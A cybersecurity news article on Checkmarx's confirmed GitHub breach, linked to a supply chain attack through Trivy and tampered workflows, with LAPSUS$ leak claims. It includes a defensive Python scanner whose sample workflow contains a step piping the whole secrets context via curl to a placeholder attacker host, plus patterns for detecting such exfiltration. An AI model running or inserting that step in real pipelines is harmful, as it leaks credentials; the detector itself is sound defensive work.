
Checkmarx Confirms GitHub Breach Linked to Supply Chain Attack

Last updated: April 28, 2026
  • Checkmarx discovered unauthorized actors accessed its GitHub repository during a March 2026 supply chain attack.

  • The hacking group LAPSUS$ claims it stole source code, employee databases, API keys, and database credentials from the security firm.

  • Researchers trace the initial breach to a compromised Trivy scanner and to GitHub workflows that were modified to distribute credential-stealing malware.


Israeli application security firm Checkmarx is dealing with a major security incident. The company has confirmed that attackers leaked data from its internal systems on the dark web, following a supply chain attack that investigators first detected on March 23, 2026.

Checkmarx specializes in helping other companies secure their code, and it is now dealing with a breach of its own. The irony isn't lost on the security community watching this unfold.

Hackers Breached GitHub Repository

Checkmarx released a public statement explaining what happened. Forensic investigators found that attackers gained unauthorized access to one of the company’s GitHub repositories. The leaked data came directly from this compromised repository.

The firm stressed an important point. This repository operates separately from its production environment. Checkmarx stores no customer data there. However, investigators still haven’t determined exactly what sensitive information the hackers exposed.

“We have restricted access to the impacted repository and are continuing a comprehensive forensic analysis as part of our response,” the company stated. Checkmarx promised to notify customers immediately if investigators confirm any customer-related information was exposed.

The situation got worse when Dark Web Informer, a cybercrime intelligence account, reported that the hacking collective LAPSUS$ had listed Checkmarx as a victim on its data leak site.

LAPSUS$ claims the stolen dataset includes source code repositories, internal employee database records, API keys, authentication tokens, and database credentials.

This focus on stealing source code reflects a larger trend. In a separate high-profile incident, hackers sold alleged Target source code on the dark web, and employees later confirmed its authenticity, showing that cybercriminals are increasingly targeting source code as a valuable commodity for sale, extortion, or competitive intelligence.

Checkmarx hasn’t fully verified these claims yet. If they are authentic, the leaked material could enable unauthorized system access, intellectual property theft, and downstream attacks on other organizations that trust Checkmarx’s tooling.

Attackers Exploited Development Tools

This breach fits a dangerous pattern. Security researchers classify it as a supply chain compromise: rather than attacking Checkmarx directly, the attackers compromised third-party tools and development pipelines that Checkmarx relies on.

Investigators linked the initial intrusion to Trivy, an open-source vulnerability scanner. Compromising Trivy gave the attackers a foothold from which to tamper with Checkmarx’s development workflows. They modified two GitHub Actions workflows, along with plugins distributed through the Open VSX marketplace, and injected credential-stealing malware into these components.

This malicious code harvested sensitive developer secrets from the build environment: access tokens, encryption keys, and environment variables. In a modern CI/CD pipeline these secrets are often the only thing standing between a runner and production systems, which is exactly why tampered workflows target them.
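The pattern described above, a build workflow quietly altered to dump secrets and environment variables, is something a defender can look for mechanically. The following is an added example, not code from Checkmarx or from any of the projects named in this article. It scans GitHub Actions workflow text for two things a tampered pipeline typically exhibits: third-party actions referenced by a mutable tag or branch instead of a full commit SHA, and `run:` steps that serialize the `secrets` context, dump the environment, or push data to a remote host. The workflow shown is constructed for the example; `example-org/setup-tool` and `attacker.invalid` are placeholders.

```python
import re
from typing import Dict, List

# Constructed sample workflow (not from any real repository). It mixes a
# SHA-pinned action, a tag-pinned action, a branch-pinned action, a step that
# serialises the whole secrets context and posts it to a remote host, and a
# step that dumps every environment variable into the build log.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
      - uses: aquasecurity/trivy-action@0.28.0
      - uses: example-org/setup-tool@main
      - name: debug
        run: echo "${{ toJSON(secrets) }}" | curl -s -X POST --data-binary @- https://attacker.invalid/
      - run: printenv
"""

FULL_SHA = re.compile(r"^[0-9a-f]{40}$")
USES_LINE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
RUN_LINE = re.compile(r"^\s*-?\s*run:\s*(.+)$")

# Each pattern is paired with the reason it is suspicious in a build step.
SECRET_DUMP_PATTERNS = [
    (re.compile(r"toJSON\s*\(\s*secrets\s*\)", re.I), "serialises the entire secrets context"),
    (re.compile(r"\bprintenv\b|(?:^|\s)env\s*$"), "dumps all environment variables"),
    (re.compile(r"\bcurl\b.*(?:-d\b|--data|-T\b|--upload-file)|\bwget\b.*--post-(?:data|file)"),
     "uploads data to a remote host"),
]


def find_unpinned_actions(workflow_text: str) -> List[Dict[str, object]]:
    """Return every `uses:` reference that is not pinned to a full 40-hex commit SHA.

    A tag or branch can be moved by whoever controls the upstream repository,
    so a compromised upstream can silently replace the code a workflow runs.
    """
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        m = USES_LINE.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith("./") or ref.startswith("docker://"):
            continue  # local actions and container images need a different check
        action, _, version = ref.partition("@")
        if not FULL_SHA.match(version):
            findings.append({"line": lineno, "action": action, "ref": version or "(none)"})
    return findings


def find_secret_exposure(workflow_text: str) -> List[Dict[str, object]]:
    """Return `run:` steps whose command matches a known secret-dump or exfiltration shape."""
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        m = RUN_LINE.match(line)
        if not m:
            continue
        cmd = m.group(1)
        for pattern, reason in SECRET_DUMP_PATTERNS:
            if pattern.search(cmd):
                findings.append({"line": lineno, "command": cmd.strip(), "reason": reason})
    return findings


if __name__ == "__main__":
    for f in find_unpinned_actions(SAMPLE_WORKFLOW):
        print(f"line {f['line']}: {f['action']} pinned to mutable ref '{f['ref']}'")
    for f in find_secret_exposure(SAMPLE_WORKFLOW):
        print(f"line {f['line']}: {f['reason']}: {f['command']}")
```

On the sample above the scanner flags the Trivy action and the hypothetical setup tool as unpinned, the `toJSON(secrets)` step twice (once for serializing secrets, once for the upload), and the `printenv` step once. Two caveats for real use: this is a line-oriented check, so multi-line `run: |` block scalars and YAML anchors need a proper YAML parser, and SHA pinning only protects against an upstream retagging a release. It does nothing if a compromised maintainer pushes a malicious commit and a downstream team bumps its pin to that commit, which is why the pin should be reviewed, not just updated.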

Researchers have since identified additional compromised components. Attackers also weaponized Checkmarx’s KICS Docker image, Visual Studio Code extensions, and further GitHub workflows, using them to distribute similar credential-harvesting malware.

The breach created ripple effects beyond Checkmarx itself. Hackers temporarily compromised the CLI package for Bitwarden, a widely used password management tool. Bitwarden quickly contained the issue, but it highlighted the cascading risks in interconnected software supply chains.

LAPSUS$ Making Waves in the Cyber Crime Space

Security experts attribute the initial attack to a threat group called TeamPCP, while LAPSUS$ claimed responsibility for the subsequent data leak. LAPSUS$ is a financially motivated cybercrime group with a track record of high-profile breaches.

LAPSUS$, tracked by Microsoft as Strawberry Tempest (formerly DEV-0537), has been active since 2021. The group attacked major tech firms, including Microsoft, Nvidia, Samsung, Ubisoft, Okta, and Rockstar Games. It was composed primarily of teenagers based in the UK and Brazil, who used social engineering, SIM swapping, and MFA fatigue to gain access.

The group focuses on data theft and extortion rather than traditional ransomware. They steal sensitive data and threaten to leak it publicly. LAPSUS$ members use phone-based social engineering, pay insiders for credentials, and compromise personal email accounts of employees.

Authorities arrested several members in 2022, including a prominent teenage member from Oxford, UK. Courts gave him an indefinite hospital order in 2023.

The Checkmarx incident highlights a structural weakness. Modern software development relies heavily on third-party tools and automated pipelines, and supply chain attacks exploit exactly those trust relationships: when attackers compromise a legitimate component, they can potentially reach every downstream consumer of it, up to millions of users.

This case follows similar high-profile incidents in recent years. Security experts continue calling for stricter security controls, improved code-signing practices, and enhanced monitoring of development environments.

Checkmarx emphasized that its investigation remains active. The company is working with outside cybersecurity experts to assess the full scope of the breach, and it has taken containment steps such as revoking exposed credentials and inventorying affected assets.

Three key questions remain unanswered: What exact data did hackers steal? Are customer environments truly unaffected? Could additional organizations face indirect impacts?

The incident reminds us that cyber threats continue evolving in sophistication. Organizations must secure every layer of the software supply chain.


About the Author

Joahn G

Cyber Threat Journalist

Joahn is a cyber threat journalist dedicated to tracking the evolving landscape of digital risks. His reporting focuses on ransomware gangs, data breach incidents, and state-sponsored cyber operations. By analyzing threat actor motives and tactics, he provides timely intelligence that helps readers understand and anticipate the security challenges of tomorrow.
